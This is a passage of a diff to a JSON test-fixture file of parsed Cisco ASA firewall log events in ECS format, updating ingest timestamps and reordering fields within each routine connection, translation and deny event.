"severity": 6, - "ingested": "2021-12-09T13:31:36.364267800Z", + "ingested": "2021-12-14T14:36:23.392360464Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11836 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1301 (172.31.98.44/1301)", "code": "302013", "kind": "event", @@ -15875,7 +15875,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364273200Z", + "ingested": "2021-12-14T14:36:23.392360887Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1302 to outside:192.168.98.44/8306", "code": "305011", "kind": "event", @@ -15954,7 +15954,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364279300Z", + "ingested": "2021-12-14T14:36:23.392361275Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11837 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1302 (172.31.98.44/1302)", "code": "302013", "kind": "event", @@ -15979,22 +15979,16 @@ } }, { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16004,12 +15998,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364284100Z", + "ingested": "2021-12-14T14:36:23.392361672Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1276 to outside:192.168.98.44/8280 duration 0:00:30", "code": "305012", "kind": "event", @@ -16023,25 +16020,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16051,12 +16045,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364305800Z", + "ingested": "2021-12-14T14:36:23.392362106Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1277 to outside:192.168.98.44/8281 duration 0:00:30", "code": "305012", "kind": "event", @@ -16070,25 +16067,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16098,12 +16092,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364356600Z", + "ingested": "2021-12-14T14:36:23.392362496Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1278 to outside:192.168.98.44/8282 duration 0:00:30", "code": "305012", "kind": "event", @@ -16117,25 +16114,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16145,12 +16139,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364361800Z", + "ingested": "2021-12-14T14:36:23.392362884Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1279 to outside:192.168.98.44/8283 duration 0:00:30", "code": "305012", "kind": "event", @@ -16164,25 +16161,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16192,12 +16186,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364366Z", + "ingested": "2021-12-14T14:36:23.392363275Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1280 to outside:192.168.98.44/8284 duration 0:00:30", "code": "305012", "kind": "event", @@ -16211,25 +16208,22 @@ }, "cisco": { "asa": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16239,12 +16233,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364371200Z", + "ingested": "2021-12-14T14:36:23.392363790Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1281 to outside:192.168.98.44/8285 duration 0:00:30", "code": "305012", "kind": "event", @@ -16258,25 +16255,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16286,12 +16280,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364375800Z", + "ingested": "2021-12-14T14:36:23.392364251Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1282 to outside:192.168.98.44/8286 duration 0:00:30", "code": "305012", "kind": "event", @@ -16305,25 +16302,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16333,12 +16327,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364380100Z", + "ingested": "2021-12-14T14:36:23.392364654Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1283 to outside:192.168.98.44/8287 duration 0:00:30", "code": "305012", "kind": "event", @@ -16352,25 +16349,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16380,12 +16374,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364384800Z", + "ingested": "2021-12-14T14:36:23.392365058Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1284 to outside:192.168.98.44/8288 duration 0:00:30", "code": "305012", "kind": "event", @@ -16399,25 +16396,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16427,12 +16421,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364388900Z", + "ingested": "2021-12-14T14:36:23.392365444Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1285 to outside:192.168.98.44/8289 duration 0:00:30", "code": "305012", "kind": "event", @@ -16446,25 +16443,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16474,12 +16468,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364393200Z", + "ingested": "2021-12-14T14:36:23.392365831Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1286 to outside:192.168.98.44/8290 duration 0:00:30", "code": "305012", "kind": "event", @@ -16493,25 +16490,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16521,12 +16515,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364398200Z", + "ingested": "2021-12-14T14:36:23.392366363Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1287 to outside:192.168.98.44/8291 duration 0:00:30", "code": "305012", "kind": "event", @@ -16540,25 +16537,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16568,12 +16562,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364402900Z", + "ingested": "2021-12-14T14:36:23.392366745Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1288 to outside:192.168.98.44/8292 duration 0:00:30", "code": "305012", "kind": "event", @@ -16587,25 +16584,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16615,12 +16609,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364407200Z", + "ingested": "2021-12-14T14:36:23.392367131Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1293 to outside:192.168.98.44/8297 duration 0:00:30", "code": "305012", "kind": "event", @@ -16634,25 +16631,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16662,12 +16656,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364411700Z", + "ingested": "2021-12-14T14:36:23.392367520Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1294 to outside:192.168.98.44/8298 duration 0:00:30", "code": "305012", "kind": "event", @@ -16681,7 +16678,10 @@ }, "cisco": { "asa": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { @@ -16742,7 +16742,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364416800Z", + "ingested": "2021-12-14T14:36:23.392367906Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1304 to outside:192.168.98.44/8308", "code": "305011", "kind": "event", @@ -16821,7 +16821,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364421400Z", + "ingested": "2021-12-14T14:36:23.392368291Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11840 for outside:192.168.205.99/80 (192.168.205.99/80) to inside:172.31.98.44/1304 (172.31.98.44/1304)", "code": "302013", "kind": "event", @@ -16846,22 +16846,16 @@ } }, { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16871,12 +16865,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364425500Z", + "ingested": "2021-12-14T14:36:23.392369497Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1295 to outside:192.168.98.44/8299 duration 0:00:30", "code": "305012", "kind": "event", @@ -16890,25 +16887,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16918,12 +16912,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364430300Z", + "ingested": "2021-12-14T14:36:23.392369981Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1296 to outside:192.168.98.44/8300 duration 0:00:30", "code": "305012", "kind": "event", @@ -16937,7 +16934,10 @@ }, "cisco": { "asa": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { @@ -16999,7 +16999,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364436400Z", + "ingested": "2021-12-14T14:36:23.392370368Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11841 for outside:192.168.0.124/53 (192.168.0.124/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -17083,7 +17083,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364441600Z", + "ingested": "2021-12-14T14:36:23.392370757Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11842 for outside:192.168.160.2/53 (192.168.160.2/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -17168,7 +17168,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:31:36.364446400Z", + "ingested": "2021-12-14T14:36:23.392371152Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11841 for outside:192.168.0.124/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 318", "code": "302016", "kind": "event", @@ -17252,7 +17252,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:31:36.364451300Z", + "ingested": "2021-12-14T14:36:23.392371921Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11842 for outside:192.168.160.2/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", "code": "302016", "kind": "event", @@ -17334,7 +17334,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364455800Z", + "ingested": "2021-12-14T14:36:23.392372309Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1305 to outside:192.168.98.44/8309", "code": "305011", "kind": "event", @@ -17413,7 +17413,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364459500Z", + "ingested": "2021-12-14T14:36:23.392372701Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11843 for outside:192.168.124.24/80 (192.168.124.24/80) to inside:172.31.98.44/1305 (172.31.98.44/1305)", "code": "302013", "kind": "event", @@ -17438,22 +17438,16 @@ } }, { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -17463,12 +17457,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364464200Z", + "ingested": "2021-12-14T14:36:23.392373143Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1297 to outside:192.168.98.44/8301 duration 0:00:30", "code": "305012", "kind": "event", @@ -17482,25 +17479,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -17510,12 +17504,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364470200Z", + "ingested": "2021-12-14T14:36:23.392373532Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1298 to outside:192.168.98.44/8302 duration 0:00:30", "code": "305012", "kind": "event", @@ -17529,25 +17526,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -17557,12 +17551,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364476300Z", + "ingested": "2021-12-14T14:36:23.392373976Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1299 to outside:192.168.98.44/8303 duration 0:00:30", "code": "305012", "kind": "event", @@ -17576,25 +17573,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -17604,12 +17598,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364482300Z", + "ingested": "2021-12-14T14:36:23.392374380Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1300 to outside:192.168.98.44/8304 duration 0:00:30", "code": "305012", "kind": "event", @@ -17623,25 +17620,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -17651,12 +17645,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364488500Z", + "ingested": "2021-12-14T14:36:23.392374772Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1301 to outside:192.168.98.44/8305 duration 0:00:30", "code": "305012", "kind": "event", @@ -17670,25 +17667,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -17698,12 +17692,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364493100Z", + "ingested": "2021-12-14T14:36:23.392375160Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1302 to outside:192.168.98.44/8306 duration 0:00:30", "code": "305012", "kind": "event", @@ -17717,25 +17714,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -17745,12 +17739,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364499100Z", + "ingested": "2021-12-14T14:36:23.392375552Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1303 to outside:192.168.98.44/8307 duration 0:00:30", "code": "305012", "kind": "event", @@ -17764,7 +17761,10 @@ }, "cisco": { "asa": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { @@ -17828,7 +17828,7 @@ "severity": 6, "duration": 4000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:31:36.364504400Z", + "ingested": "2021-12-14T14:36:23.392375940Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11843 for outside:192.168.124.24/80 to inside:172.31.98.44/1305 duration 0:00:04 bytes 410333 TCP Reset-I", "code": "302014", "kind": "event", @@ -17910,7 +17910,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364509600Z", + "ingested": "2021-12-14T14:36:23.392376383Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -17991,7 +17991,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364513400Z", + "ingested": "2021-12-14T14:36:23.392376827Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18072,7 +18072,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364517600Z", + "ingested": "2021-12-14T14:36:23.392377207Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18153,7 +18153,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364539800Z", + "ingested": "2021-12-14T14:36:23.392377593Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1306 to outside:192.168.98.44/8310", "code": "305011", "kind": "event", @@ -18232,7 +18232,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364544300Z", + "ingested": "2021-12-14T14:36:23.392377973Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11844 for outside:192.168.124.24/80 (192.168.124.24/80) to inside:172.31.98.44/1306 (172.31.98.44/1306)", "code": "302013", "kind": "event", @@ -18315,7 +18315,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364549500Z", + "ingested": "2021-12-14T14:36:23.392378359Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18396,7 +18396,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364553700Z", + "ingested": "2021-12-14T14:36:23.392378856Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18477,7 +18477,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364557800Z", + "ingested": "2021-12-14T14:36:23.392379243Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18558,7 +18558,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364562Z", + "ingested": "2021-12-14T14:36:23.392379646Z", "original": "Oct 10 2018 12:34:56 localhost 